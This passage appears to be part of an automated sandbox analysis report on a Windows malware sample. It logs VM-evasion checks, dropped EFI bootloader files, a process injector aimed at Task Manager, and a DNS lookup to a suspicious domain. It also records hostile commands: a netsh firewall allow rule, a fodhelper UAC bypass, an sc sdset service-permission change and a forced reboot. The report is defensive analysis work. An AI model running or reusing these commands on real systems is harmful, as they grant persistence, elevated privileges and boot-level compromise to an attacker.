        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
        Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8504
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8597
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8368
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8562
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8327
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8260
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8504
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8214
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8294
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8248
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8413
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8222
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7947
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Window / User API: threadDelayed 370
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: VBoxGuest
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: vmci
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: HGFS
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: VBoxTrayIPC
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: \pipe\VBoxTrayIPC
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	File opened / queried: VBoxMiniRdrDN
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: main.isRunningInsideVMWare
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: TrafficDNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
